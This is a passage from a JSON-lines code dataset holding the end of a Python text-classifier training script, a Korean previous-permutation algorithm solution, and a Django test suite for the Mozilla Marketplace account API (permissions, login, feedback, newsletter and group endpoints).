\\n'.format(chkpt_path))\r\n\r\n imdb = IMDB(action='fetch')\r\n x_train, y_train, docsize_train, 
sent_size_train = imdb.get_data(type=CONFIG['run_type'])\r\n\r\n for epoch, batch in imdb.get_batch(data=list(zip(x_train,y_train,docsize_train,sent_size_train)),\r\n batch_size=CONFIG['batch_size'],\r\n num_epoch=CONFIG['num_epochs']):\r\n x_batch, y_batch, docsize, sent_size = zip(*batch)\r\n\r\n train_step(epoch=epoch,\r\n x_batch=x_batch,\r\n y_batch=y_batch,\r\n docsize=docsize,\r\n sent_size=sent_size,\r\n is_training=True)","repo_name":"LiaoBoWen/MyProject","sub_path":"Leaning/Model-studying/9_HAN/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"32511985","text":"# 이전 수열\n\nn = int(input())\ndata = list(map(int, input().split()))\n\nlength = len(data)\nk = -1\nfor i in range(length-1):\n # data[i] > data[i+1]을 만족하는 수 중 가장 큰 인덱스\n if data[i] > data[i+1]:\n k = i\n \nif k == -1:\n print(-1)\nelse:\n for j in range(k+1, length):\n # data[k] > data[j]를 만족하는 가장 큰 인덱스 \n if data[k] > data[j]:\n m = j\n\n data[k], data[m] = data[m], data[k]\n\n temp = data[k+1:]\n # 역순으로 정렬하기\n temp.sort(reverse=True)\n answer = data[:k+1] + temp\n\n for i in answer:\n print(i, end = ' ')","repo_name":"limgeonho/Algorithm-1","sub_path":"BOJ/Brute-Force/[BOJ]10973.py","file_name":"[BOJ]10973.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17480519105","text":"# -*- coding: utf-8 -*-\nimport collections\nimport json\nimport uuid\nfrom datetime import datetime\nfrom urlparse import urlparse\n\nfrom django.conf import settings\nfrom django.core import mail\nfrom django.core.urlresolvers import reverse\nfrom django.http import QueryDict\nfrom django.utils.http import urlencode\n\nfrom jingo.helpers import urlparams\nfrom mock import patch, Mock\nfrom nose.tools import eq_, ok_\n\nimport mkt\nfrom mkt.account.views import MineMixin\nfrom mkt.access.models import Group, GroupUser\nfrom mkt.api.tests.test_oauth import RestOAuth\nfrom mkt.constants.apps import INSTALL_TYPE_REVIEWER\nfrom mkt.site.fixtures import fixture\nfrom mkt.site.tests import TestCase\nfrom mkt.site.utils import app_factory\nfrom mkt.webapps.models import Installed, Webapp\nfrom mkt.users.models import UserProfile\n\n\nclass TestPotatoCaptcha(object):\n\n def _test_bad_api_potato_data(self, response, data=None):\n if not data:\n data = json.loads(response.content)\n eq_(400, response.status_code)\n ok_('non_field_errors' in data)\n eq_(data['non_field_errors'], [u'Form could not be submitted.'])\n\n\nclass FakeResourceBase(object):\n pass\n\n\nclass FakeResource(MineMixin, FakeResourceBase):\n def __init__(self, pk, request):\n self.kwargs = {'pk': pk}\n self.request = request\n\n\nclass TestMine(TestCase):\n fixtures = fixture('user_2519')\n\n def setUp(self):\n self.request = Mock()\n self.request.user = UserProfile.objects.get(id=2519)\n\n @patch.object(FakeResourceBase, 'get_object', create=True)\n def test_get_object(self, mocked_get_object):\n r = FakeResource(999, self.request)\n r.get_object()\n eq_(r.kwargs['pk'], 999)\n\n r = FakeResource('mine', self.request)\n r.get_object()\n eq_(r.kwargs['pk'], 2519)\n\n\nclass TestPermission(RestOAuth):\n fixtures = fixture('user_2519', 'user_10482')\n\n def setUp(self):\n super(TestPermission, self).setUp()\n self.get_url = reverse('account-permissions', kwargs={'pk': 2519})\n self.user = UserProfile.objects.get(pk=2519)\n\n def test_has_cors(self):\n 
self.assertCORS(self.client.get(self.get_url), 'get')\n\n def test_verbs(self):\n self._allowed_verbs(self.get_url, ('get'))\n\n def test_other(self):\n self.get_url = reverse('account-permissions', kwargs={'pk': 10482})\n eq_(self.client.get(self.get_url).status_code, 403)\n\n def test_no_permissions(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200, res.content)\n self.assertSetEqual(\n ['admin', 'developer', 'localizer', 'lookup', 'curator',\n 'reviewer', 'webpay', 'website_submitter', 'stats',\n 'revenue_stats', 'content_tools_addon_review'],\n res.json['permissions'].keys()\n )\n ok_(not all(res.json['permissions'].values()))\n\n def test_some_permission(self):\n self.grant_permission(self.user, 'Localizers:%')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['localizer'])\n\n def test_mine(self):\n self.get_url = reverse('account-permissions', kwargs={'pk': 'mine'})\n self.test_some_permission()\n\n def test_mine_anon(self):\n self.get_url = reverse('account-permissions', kwargs={'pk': 'mine'})\n res = self.anon.get(self.get_url)\n eq_(res.status_code, 403)\n\n def test_publisher(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(not res.json['permissions']['curator'])\n\n def test_publisher_ok(self):\n self.grant_permission(self.user, 'Collections:Curate')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['curator'])\n\n def test_feed_publisher_ok(self):\n self.grant_permission(self.user, 'Feed:Curate')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['curator'])\n\n def test_webpay(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(not res.json['permissions']['webpay'])\n\n def test_webpay_ok(self):\n self.grant_permission(self.user, 'ProductIcon:Create')\n self.grant_permission(self.user, 'Transaction:NotifyFailure')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['webpay'])\n\n def test_website_submitter(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(not res.json['permissions']['website_submitter'])\n\n def test_website_submitter_ok(self):\n self.grant_permission(self.user, 'Websites:Submit')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['website_submitter'])\n\n def test_stats(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(not res.json['permissions']['stats'])\n\n def test_stats_ok(self):\n self.grant_permission(self.user, 'Stats:View')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['stats'])\n\n def test_revenue_stats(self):\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(not res.json['permissions']['revenue_stats'])\n\n def test_revenue_stats_ok(self):\n self.grant_permission(self.user, 'RevenueStats:View')\n res = self.client.get(self.get_url)\n eq_(res.status_code, 200)\n ok_(res.json['permissions']['revenue_stats'])\n\n\nclass TestAccount(RestOAuth):\n fixtures = fixture('user_2519', 'user_10482', 'webapp_337141')\n\n def setUp(self):\n super(TestAccount, self).setUp()\n self.url = reverse('account-settings', kwargs={'pk': 2519})\n self.user = UserProfile.objects.get(pk=2519)\n\n def test_has_cors(self):\n self.assertCORS(self.client.get(self.url), 'get', 'patch', 'put')\n\n def test_verbs(self):\n self._allowed_verbs(self.url, 
('get', 'patch', 'put'))\n\n def test_not_allowed(self):\n eq_(self.anon.get(self.url).status_code, 403)\n\n def test_allowed(self):\n res = self.client.get(self.url)\n eq_(res.status_code, 200, res.content)\n data = json.loads(res.content)\n eq_(data['display_name'], self.user.display_name)\n\n def test_other(self):\n url = reverse('account-settings', kwargs={'pk': 10482})\n eq_(self.client.get(url).status_code, 403)\n\n def test_own(self):\n url = reverse('account-settings', kwargs={'pk': 'mine'})\n res = self.client.get(url)\n eq_(res.status_code, 200)\n data = json.loads(res.content)\n eq_(data['display_name'], self.user.display_name)\n\n def test_own_empty_name(self):\n self.user.update(display_name='')\n url = reverse('account-settings', kwargs={'pk': 'mine'})\n res = self.client.get(url)\n eq_(res.status_code, 200)\n data = json.loads(res.content)\n eq_(data['display_name'], 'user-2519')\n\n def test_patch(self):\n res = self.client.patch(\n self.url, data=json.dumps({'display_name': 'foo',\n 'enable_recommendations': '0',\n 'fxa_uid': 'f' * 32}))\n eq_(res.status_code, 200)\n user = UserProfile.objects.get(pk=self.user.pk)\n eq_(user.display_name, 'foo')\n eq_(user.enable_recommendations, False)\n eq_(user.fxa_uid, None)\n\n def test_patch_empty(self):\n res = self.client.patch(self.url,\n data=json.dumps({'display_name': None}))\n eq_(res.status_code, 400)\n data = json.loads(res.content)\n eq_(data['display_name'], [u'This field may not be null.'])\n\n res = self.client.patch(self.url,\n data=json.dumps({'display_name': ''}))\n eq_(res.status_code, 400)\n data = json.loads(res.content)\n eq_(data['display_name'], [u'This field may not be blank.'])\n\n def test_put(self):\n res = self.client.put(\n self.url, data=json.dumps({'display_name': 'foo',\n 'enable_recommendations': '0',\n 'fxa_uid': 'f' * 32}))\n eq_(res.status_code, 200)\n user = UserProfile.objects.get(pk=self.user.pk)\n eq_(user.display_name, 'foo')\n eq_(user.enable_recommendations, False)\n eq_(user.fxa_uid, None)\n\n def test_patch_extra_fields(self):\n res = self.client.patch(self.url,\n data=json.dumps({'display_name': 'foo',\n 'fxa_uid': 'f' * 32}))\n eq_(res.status_code, 200)\n user = UserProfile.objects.get(pk=self.user.pk)\n eq_(user.display_name, 'foo') # Got changed successfully.\n eq_(user.fxa_uid, None)\n\n def test_patch_other(self):\n url = reverse('account-settings', kwargs={'pk': 10482})\n res = self.client.patch(url, data=json.dumps({'display_name': 'foo'}))\n eq_(res.status_code, 403)\n\n\nclass TestInstalled(RestOAuth):\n fixtures = fixture('user_2519', 'user_10482', 'webapp_337141')\n\n def setUp(self):\n super(TestInstalled, self).setUp()\n self.list_url = reverse('installed-apps')\n self.remove_app_url = reverse('installed-apps-remove')\n self.user = UserProfile.objects.get(pk=2519)\n\n def test_has_cors(self):\n self.assertCORS(self.client.post(self.remove_app_url), 'post')\n self.assertCORS(self.client.options(self.list_url), 'get')\n\n def test_verbs(self):\n self._allowed_verbs(self.list_url, ('get'))\n self._allowed_verbs(self.remove_app_url, ('post'))\n\n def test_not_allowed(self):\n eq_(self.anon.get(self.list_url).status_code, 403)\n\n def test_installed(self):\n ins = Installed.objects.create(user=self.user, addon_id=337141)\n res = self.client.get(self.list_url)\n eq_(res.status_code, 200, res.content)\n data = json.loads(res.content)\n eq_(data['meta']['total_count'], 1)\n eq_(data['objects'][0]['id'], ins.addon.pk)\n eq_(data['objects'][0]['user'],\n {'developed': False, 
'purchased': False, 'installed': True})\n\n def test_installed_pagination(self):\n ins1 = Installed.objects.create(user=self.user, addon=app_factory())\n ins1.update(created=self.days_ago(1))\n ins2 = Installed.objects.create(user=self.user, addon=app_factory())\n ins2.update(created=self.days_ago(2))\n ins3 = Installed.objects.create(user=self.user, addon=app_factory())\n ins3.update(created=self.days_ago(3))\n res = self.client.get(self.list_url, {'limit': 2})\n eq_(res.status_code, 200)\n data = json.loads(res.content)\n\n eq_(len(data['objects']), 2)\n eq_(data['objects'][0]['id'], ins1.addon.id)\n eq_(data['objects'][1]['id'], ins2.addon.id)\n eq_(data['meta']['total_count'], 3)\n eq_(data['meta']['limit'], 2)\n eq_(data['meta']['previous'], None)\n eq_(data['meta']['offset'], 0)\n next = urlparse(data['meta']['next'])\n eq_(next.path, self.list_url)\n eq_(QueryDict(next.query).dict(), {u'limit': u'2', u'offset': u'2'})\n\n res = self.client.get(self.list_url, {'limit': 2, 'offset': 2})\n eq_(res.status_code, 200)\n data = json.loads(res.content)\n\n eq_(len(data['objects']), 1)\n eq_(data['objects'][0]['id'], ins3.addon.id)\n eq_(data['meta']['total_count'], 3)\n eq_(data['meta']['limit'], 2)\n prev = urlparse(data['meta']['previous'])\n eq_(next.path, self.list_url)\n eq_(QueryDict(prev.query).dict(), {u'limit': u'2'})\n eq_(data['meta']['offset'], 2)\n eq_(data['meta']['next'], None)\n\n def test_installed_order(self):\n # Should be reverse chronological order.\n ins1 = Installed.objects.create(user=self.user, addon=app_factory())\n ins1.update(created=self.days_ago(1))\n ins2 = Installed.objects.create(user=self.user, addon=app_factory())\n ins2.update(created=self.days_ago(2))\n res = self.client.get(self.list_url)\n eq_(res.status_code, 200)\n data = json.loads(res.content)\n eq_(len(data['objects']), 2)\n eq_(data['objects'][0]['id'], ins1.addon.id)\n eq_(data['objects'][1]['id'], ins2.addon.id)\n\n def not_there(self):\n res = self.client.get(self.list_url)\n eq_(res.status_code, 200, res.content)\n data = json.loads(res.content)\n eq_(data['meta']['total_count'], 0)\n\n def test_installed_other(self):\n Installed.objects.create(user_id=10482, addon_id=337141)\n self.not_there()\n\n def test_installed_reviewer(self):\n Installed.objects.create(user=self.user, addon_id=337141,\n install_type=INSTALL_TYPE_REVIEWER)\n self.not_there()\n\n def test_installed_remove_app_anonymous(self):\n eq_(self.anon.get(self.remove_app_url).status_code, 403)\n eq_(self.anon.post(self.remove_app_url, {'app': 42}).status_code, 403)\n\n def test_installed_remove_app_not_installed(self):\n data = {'app': 4242}\n res = self.client.post(self.remove_app_url, json.dumps(data))\n eq_(res.status_code, 400)\n\n data = {}\n res = self.client.post(self.remove_app_url, json.dumps(data))\n eq_(res.status_code, 400)\n\n def test_installed_remove_app_get(self):\n eq_(self.client.get(self.remove_app_url).status_code, 405)\n\n def test_installed_remove_app(self):\n Installed.objects.create(user=self.user, addon_id=337141)\n app = app_factory()\n Installed.objects.create(user=self.user, addon=app)\n data = {'app': app.pk}\n res = self.client.post(self.remove_app_url, json.dumps(data))\n eq_(res.status_code, 202)\n # Make sure there are still 2 apps, but we removed one from the\n # installed list...\n eq_(Webapp.objects.count(), 2)\n eq_(list(self.user.installed_set.values_list('addon_id', flat=True)),\n [337141])\n\n def test_installed_remove_app_not_user_installed(self):\n Installed.objects.create(user=self.user, 
addon_id=337141)\n app = app_factory()\n Installed.objects.create(user=self.user, addon=app,\n install_type=INSTALL_TYPE_REVIEWER)\n data = {'app': app.pk}\n res = self.client.post(self.remove_app_url, json.dumps(data))\n eq_(res.status_code, 400)\n\n\nclass FakeUUID(object):\n hex = '000000'\n\n\n@patch.object(settings, 'SECRET_KEY', 'gubbish')\nclass TestLoginHandler(TestCase):\n\n def setUp(self):\n super(TestLoginHandler, self).setUp()\n self.url = reverse('account-login')\n self.logout_url = reverse('account-logout')\n\n def post(self, data):\n return self.client.post(self.url, json.dumps(data),\n content_type='application/json')\n\n @patch.object(uuid, 'uuid4', FakeUUID)\n @patch('requests.post')\n def _test_login(self, http_request):\n FakeResponse = collections.namedtuple('FakeResponse',\n 'status_code json')\n http_request.return_value = FakeResponse(\n 200, lambda: {'status': 'okay', 'email': 'cvan@mozilla.com'})\n res = self.post({'assertion': 'fake-assertion',\n 'audience': 'fakemkt.org'})\n eq_(res.status_code, 201)\n data = json.loads(res.content)\n eq_(data['token'],\n 'cvan@mozilla.com,95c9063d9f249aacfe5697fc83192ed6480c01463e2a80b3'\n '5af5ecaef11754700f4be33818d0e83a0cfc2cab365d60ba53b3c2b9f8f6589d1'\n 'c43e9bbb876eef0,000000')\n\n return data\n\n def test_login_new_user_success(self):\n data = self._test_login()\n ok_(not any(data['permissions'].values()))\n\n def test_login_existing_user_success(self):\n profile = UserProfile.objects.create(email='cvan@mozilla.com',\n display_name='seavan')\n self.grant_permission(profile, 'Apps:Review')\n\n data = self._test_login()\n eq_(data['settings']['display_name'], 'seavan')\n eq_(data['settings']['email'], 'cvan@mozilla.com')\n eq_(data['settings']['enable_recommendations'], True)\n eq_(data['permissions'],\n {'admin': False,\n 'developer': False,\n 'localizer': False,\n 'lookup': False,\n 'curator': False,\n 'reviewer': True,\n 'webpay': False,\n 'website_submitter': False,\n 'stats': False,\n 'revenue_stats': False,\n 'content_tools_addon_review': False})\n eq_(data['apps']['installed'], [])\n eq_(data['apps']['purchased'], [])\n eq_(data['apps']['developed'], [])\n\n @patch('mkt.users.models.UserProfile.purchase_ids')\n def test_relevant_apps(self, purchase_ids):\n profile = UserProfile.objects.create(email='cvan@mozilla.com')\n purchased_app = app_factory()\n purchase_ids.return_value = [purchased_app.pk]\n developed_app = app_factory()\n developed_app.addonuser_set.create(user=profile)\n installed_app = app_factory()\n installed_app.installed.create(user=profile)\n\n data = self._test_login()\n eq_(data['apps']['installed'], [installed_app.pk])\n eq_(data['apps']['purchased'], [purchased_app.pk])\n eq_(data['apps']['developed'], [developed_app.pk])\n\n @patch('requests.post')\n def test_login_failure(self, http_request):\n FakeResponse = collections.namedtuple('FakeResponse',\n 'status_code json')\n http_request.return_value = FakeResponse(\n 200, lambda: {'status': 'busted'})\n res = self.post({'assertion': 'fake-assertion',\n 'audience': 'fakemkt.org'})\n eq_(res.status_code, 403)\n\n def test_login_empty(self):\n res = self.post({})\n data = json.loads(res.content)\n eq_(res.status_code, 400)\n assert 'assertion' in data\n assert 'apps' not in data\n\n def test_logout(self):\n UserProfile.objects.create(email='cvan@mozilla.com')\n data = self._test_login()\n\n r = self.client.delete(\n urlparams(self.logout_url, _user=data['token']),\n content_type='application/json')\n eq_(r.status_code, 
204)\n\n\n@patch.object(settings, 'SECRET_KEY', 'gubbish')\nclass TestFxaLoginHandler(TestCase):\n\n def setUp(self):\n super(TestFxaLoginHandler, self).setUp()\n self.url = reverse('fxa-account-login')\n self.logout_url = reverse('account-logout')\n\n def post(self, data):\n return self.client.post(self.url, json.dumps(data),\n content_type='application/json')\n\n @patch.object(uuid, 'uuid4', FakeUUID)\n @patch('requests.post')\n def _test_login(self, http_request, state='fake-state'):\n with patch('mkt.account.views.OAuth2Session') as get_session:\n m = get_session()\n m.fetch_token.return_value = {'access_token': 'fake'}\n m.post().json.return_value = {\n 'user': 'fake-uid',\n 'email': 'cvan@mozilla.com'\n }\n res = self.post({\n 'auth_response': 'https://testserver/?access_token=fake-token&'\n 'code=coed&state=' + state,\n 'state': state})\n eq_(res.status_code, 201)\n data = json.loads(res.content)\n eq_(data['token'],\n 'cvan@mozilla.com,95c9063d9f249aacfe5697fc83192ed6480c01463e2a'\n '80b35af5ecaef11754700f4be33818d0e83a0cfc2cab365d60ba53b3c2b9f'\n '8f6589d1c43e9bbb876eef0,000000')\n return data\n\n def test_login_new_user_success(self):\n eq_(UserProfile.objects.count(), 0)\n data = self._test_login()\n\n ok_(not any(data['permissions'].values()))\n profile = UserProfile.objects.get()\n eq_(profile.email, 'cvan@mozilla.com')\n eq_(profile.fxa_uid, 'fake-uid')\n\n def test_login_existing_user_uid_success(self):\n profile = UserProfile.objects.create(fxa_uid='fake-uid',\n email='old@mozilla.com',\n display_name='seavan')\n self.grant_permission(profile, 'Apps:Review')\n\n data = self._test_login()\n profile.reload()\n eq_(profile.source, mkt.LOGIN_SOURCE_FXA)\n eq_(data['settings']['display_name'], 'seavan')\n eq_(data['settings']['email'], 'cvan@mozilla.com')\n eq_(data['settings']['enable_recommendations'], True)\n eq_(data['permissions'],\n {'admin': False,\n 'developer': False,\n 'localizer': False,\n 'lookup': False,\n 'curator': False,\n 'reviewer': True,\n 'webpay': False,\n 'website_submitter': False,\n 'stats': False,\n 'revenue_stats': False,\n 'content_tools_addon_review': False})\n eq_(data['apps']['installed'], [])\n eq_(data['apps']['purchased'], [])\n eq_(data['apps']['developed'], [])\n\n # Ensure user profile got updated with email.\n eq_(profile.email, 'cvan@mozilla.com')\n\n # Ensure fxa_uid stayed the same.\n eq_(profile.fxa_uid, 'fake-uid')\n\n @patch('mkt.users.models.UserProfile.purchase_ids')\n def test_relevant_apps(self, purchase_ids):\n profile = UserProfile.objects.create(email='cvan@mozilla.com',\n fxa_uid='fake-uid')\n purchased_app = app_factory()\n purchase_ids.return_value = [purchased_app.pk]\n developed_app = app_factory()\n developed_app.addonuser_set.create(user=profile)\n installed_app = app_factory()\n installed_app.installed.create(user=profile)\n\n data = self._test_login()\n eq_(data['apps']['installed'], [installed_app.pk])\n eq_(data['apps']['purchased'], [purchased_app.pk])\n eq_(data['apps']['developed'], [developed_app.pk])\n\n @patch('requests.post')\n def test_login_failure(self, http_request):\n with patch('mkt.account.views.OAuth2Session') as get_session:\n m = get_session()\n m.fetch_token.return_value = {'access_token': 'fake'}\n m.post().json.return_value = {'error': 'busted'}\n res = self.post({'auth_response': 'x',\n 'state': 'y'})\n eq_(res.status_code, 403)\n\n def test_login_empty(self):\n res = self.post({})\n data = json.loads(res.content)\n eq_(res.status_code, 400)\n assert 'auth_response' in data\n assert 'apps' not in 
data\n\n def test_login_settings(self):\n data = self._test_login()\n eq_(data['settings']['source'], 'firefox-accounts')\n\n @patch.object(uuid, 'uuid4', FakeUUID)\n @patch('requests.post')\n def test_login_sets_has_logged_in(self, http_request):\n state = 'fake-state'\n with patch('mkt.account.views.OAuth2Session') as get_session:\n m = get_session()\n m.fetch_token.return_value = {'access_token': 'fake'}\n m.post().json.return_value = {\n 'user': 'fake-uid',\n 'email': 'cvan@mozilla.com'\n }\n res = self.post({\n 'auth_response': 'https://testserver/?access_token=fake-token&'\n 'code=coed&state=' + state,\n 'state': state})\n ok_('has_logged_in' in res.cookies)\n eq_(res.cookies['has_logged_in'].value, '1')\n\n def test_logout(self):\n data = self._test_login()\n\n r = self.client.delete(\n urlparams(self.logout_url, _user=data['token']),\n content_type='application/json')\n eq_(r.status_code, 204)\n\n\nclass TestFeedbackHandler(TestPotatoCaptcha, RestOAuth):\n\n def setUp(self):\n super(TestFeedbackHandler, self).setUp()\n self.url = reverse('account-feedback')\n self.user = UserProfile.objects.get(pk=2519)\n self.default_data = {\n 'chromeless': 'no',\n 'feedback': u'Hér€ is whàt I rælly think.',\n 'platform': u'Desktøp',\n 'from_url': '/feedback',\n 'sprout': 'potato'\n }\n self.headers = {\n 'HTTP_USER_AGENT': 'Fiiia-fox',\n 'REMOTE_ADDR': '48.151.623.42'\n }\n\n def _call(self, anonymous=False, data=None):\n post_data = self.default_data.copy()\n client = self.anon if anonymous else self.client\n if anonymous:\n post_data['tuber'] = ''\n post_data['sprout'] = 'potato'\n if data:\n post_data.update(data)\n res = client.post(self.url, data=json.dumps(post_data),\n **self.headers)\n return res, json.loads(res.content)\n\n def _test_success(self, res, data):\n eq_(201, res.status_code)\n\n fields = self.default_data.copy()\n\n # PotatoCaptcha field shouldn't be present in returned data.\n del fields['sprout']\n ok_('sprout' not in data)\n\n # Rest of the fields should all be here.\n for name in fields.keys():\n eq_(fields[name], data[name])\n\n eq_(len(mail.outbox), 1)\n assert self.default_data['feedback'] in mail.outbox[0].body\n assert self.headers['REMOTE_ADDR'] in mail.outbox[0].body\n\n def test_send(self):\n res, data = self._call()\n self._test_success(res, data)\n eq_(unicode(self.user), data['user'])\n email = mail.outbox[0]\n eq_(email.from_email, settings.DEFAULT_FROM_EMAIL)\n eq_(email.extra_headers['Reply-To'], self.user.email)\n assert self.user.name in email.body\n assert unicode(self.user.pk) in email.body\n assert self.user.email in email.body\n\n def test_send_urlencode(self):\n self.headers['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'\n post_data = self.default_data.copy()\n res = self.client.post(self.url, data=urlencode(post_data),\n **self.headers)\n data = json.loads(res.content)\n self._test_success(res, data)\n eq_(unicode(self.user), data['user'])\n email = mail.outbox[0]\n eq_(email.from_email, settings.DEFAULT_FROM_EMAIL)\n eq_(email.extra_headers['Reply-To'], self.user.email)\n\n def test_send_without_platform(self):\n del self.default_data['platform']\n self.url += '?dev=platfoo'\n\n res, data = self._call()\n self._test_success(res, data)\n assert 'platfoo' in mail.outbox[0].body\n\n def test_send_anonymous(self):\n res, data = self._call(anonymous=True)\n self._test_success(res, data)\n assert not data.get('user')\n assert 'Anonymous' in mail.outbox[0].body\n eq_(settings.NOBODY_EMAIL, mail.outbox[0].from_email)\n\n def 
test_send_potato(self):\n tuber_res, tuber_data = self._call(data={'tuber': 'potat-toh'},\n anonymous=True)\n potato_res, potato_data = self._call(data={'sprout': 'potat-toh'},\n anonymous=True)\n self._test_bad_api_potato_data(tuber_res, tuber_data)\n self._test_bad_api_potato_data(potato_res, potato_data)\n\n def test_missing_optional_field(self):\n res, data = self._call(data={'platform': None})\n eq_(201, res.status_code)\n\n def test_send_bad_data(self):\n \"\"\"\n One test to ensure that Feedback API is doing its validation duties.\n \"\"\"\n res, data = self._call(data={'feedback': None})\n eq_(400, res.status_code)\n assert 'feedback' in data\n\n def test_bad_feedback_data(self):\n # test to ensure feedback with only white spaces are not submitted\n res, data = self._call(data={'feedback': ' '})\n eq_(400, res.status_code)\n assert 'feedback' in data\n\n\nclass TestNewsletter(RestOAuth):\n VALID_EMAIL = 'bob@example.com'\n VALID_PLUS_EMAIL = 'bob+totally+real@example.com'\n INVALID_EMAIL = '!not_an_email'\n\n def setUp(self):\n super(TestNewsletter, self).setUp()\n self.url = reverse('account-newsletter')\n\n @patch('basket.subscribe')\n def test_signup_bad(self, subscribe):\n res = self.client.post(self.url,\n data=json.dumps({'email': self.INVALID_EMAIL}))\n eq_(res.status_code, 400)\n ok_(not subscribe.called)\n\n @patch('basket.subscribe')\n def test_signup_empty(self, subscribe):\n res = self.client.post(self.url)\n eq_(res.status_code, 400)\n ok_(not subscribe.called)\n\n @patch('basket.subscribe')\n def test_signup_invalid_newsletter(self, subscribe):\n res = self.client.post(self.url, data={'email': self.VALID_EMAIL,\n 'lang': 'en-US',\n 'newsletter': 'invalid'})\n eq_(res.status_code, 400)\n ok_(not subscribe.called)\n\n @patch('basket.subscribe')\n def test_signup_anonymous(self, subscribe):\n res = self.anon.post(self.url,\n data=json.dumps({'email': self.VALID_EMAIL,\n 'lang': 'en-US'}))\n eq_(res.status_code, 204)\n subscribe.assert_called_with(\n self.VALID_EMAIL, 'marketplace', lang='en-US',\n country='', trigger_welcome='Y', optin='Y', format='H')\n\n @patch('basket.subscribe')\n def test_signup_lang(self, subscribe):\n res = self.anon.post(self.url,\n data=json.dumps({'email': self.VALID_EMAIL,\n 'lang': 'es'}))\n eq_(res.status_code, 204)\n subscribe.assert_called_with(\n self.VALID_EMAIL, 'marketplace', lang='es',\n country='', trigger_welcome='Y', optin='Y', format='H')\n\n @patch('basket.subscribe')\n def test_signup(self, subscribe):\n res = self.client.post(self.url,\n data=json.dumps({'email': self.VALID_EMAIL,\n 'lang': 'en-US'}))\n eq_(res.status_code, 204)\n subscribe.assert_called_with(\n self.VALID_EMAIL, 'marketplace', lang='en-US',\n country='', trigger_welcome='Y', optin='Y', format='H')\n\n @patch('mkt.account.views.NewsletterView.get_region')\n @patch('basket.subscribe')\n def test_signup_us(self, subscribe, get_region):\n get_region.return_value = 'us'\n res = self.client.post(self.url,\n data=json.dumps({'email': self.VALID_EMAIL,\n 'lang': 'en-US'}))\n eq_(res.status_code, 204)\n subscribe.assert_called_with(\n self.VALID_EMAIL, 'marketplace', lang='en-US',\n country='us', trigger_welcome='Y', optin='Y', format='H')\n\n @patch('basket.subscribe')\n def test_signup_plus(self, subscribe):\n res = self.client.post(\n self.url,\n data=json.dumps({'email': self.VALID_PLUS_EMAIL,\n 'lang': 'en-US'}))\n subscribe.assert_called_with(\n self.VALID_PLUS_EMAIL, 'marketplace', lang='en-US',\n country='', trigger_welcome='Y', optin='Y', format='H')\n 
eq_(res.status_code, 204)\n\n @patch('basket.subscribe')\n def test_signup_about_apps(self, subscribe):\n res = self.client.post(self.url,\n data=json.dumps({'email': self.VALID_EMAIL,\n 'lang': 'en-US',\n 'newsletter': 'about:apps'}))\n eq_(res.status_code, 204)\n subscribe.assert_called_with(\n self.VALID_EMAIL, 'mozilla-and-you,marketplace-desktop',\n lang='en-US', country='', trigger_welcome='Y',\n optin='Y', format='H')\n\n\nclass TestGroupsViewSet(RestOAuth):\n fixtures = fixture('user_2519', 'user_999')\n\n @classmethod\n def setUpTestData(cls):\n cls.target_user = UserProfile.objects.get(pk=999)\n cls.normal_group = Group.objects.create(name=u'NGr\\u00F4up', rules=\"\")\n cls.restricted_group = Group.objects.create(\n name=u'\\u0158Group', rules=\"\", restricted=True)\n cls.url = reverse('account-groups', kwargs={'pk': 999})\n\n def setUp(self):\n super(TestGroupsViewSet, self).setUp()\n self.grant_permission(self.user, 'Admin:%')\n\n def test_has_cors(self):\n self.assertCORS(self.client.get(self.url), 'get', 'delete', 'post')\n\n def test_verbs(self):\n self._allowed_verbs(self.url, ('get', 'delete', 'post'))\n\n def test_anon(self):\n eq_(self.anon.get(self.url).status_code, 403)\n\n def test_non_admin(self):\n self.remove_permission(self.user, 'Admin:%')\n eq_(self.client.get(self.url).status_code, 403)\n\n def test_list(self):\n GroupUser.objects.create(group=self.normal_group,\n user=self.target_user)\n GroupUser.objects.create(group=self.restricted_group,\n user=self.target_user)\n res = self.client.get(self.url)\n eq_(res.status_code, 200, res.content)\n data = json.loads(res.content)\n # Check target has those two groups.\n eq_(data[0]['id'], self.normal_group.pk)\n eq_(data[0]['name'], self.normal_group.name)\n eq_(data[0]['restricted'], self.normal_group.restricted)\n eq_(data[1]['id'], self.restricted_group.pk)\n eq_(data[1]['name'], self.restricted_group.name)\n eq_(data[1]['restricted'], self.restricted_group.restricted)\n\n def test_list_invalid_user_id(self):\n url = reverse('account-groups', kwargs={'pk': 54321})\n eq_(self.client.get(url).status_code, 400)\n\n def do_post(self, group_id):\n return self.client.post(self.url, data=json.dumps({'group': group_id}))\n\n def do_delete(self, group_id):\n return self.client.delete(self.url, data={'group': group_id})\n\n def test_add_group_valid(self):\n res = self.do_post(self.normal_group.pk)\n eq_(res.status_code, 201, res.content)\n\n def test_add_group_fail_admin(self):\n res = self.do_post(self.restricted_group.pk)\n eq_(res.status_code, 400, res.content)\n\n def test_add_group_fail_already_member(self):\n GroupUser.objects.create(group=self.normal_group,\n user=self.target_user)\n res = self.do_post(self.normal_group.pk)\n eq_(res.status_code, 400, res.content)\n\n def test_add_group_fail_no_group(self):\n res = self.do_post(123456)\n eq_(res.status_code, 400, res.content)\n\n def test_remove_group_valid(self):\n GroupUser.objects.create(group=self.normal_group,\n user=self.target_user)\n res = self.do_delete(self.normal_group.pk)\n eq_(res.status_code, 204, 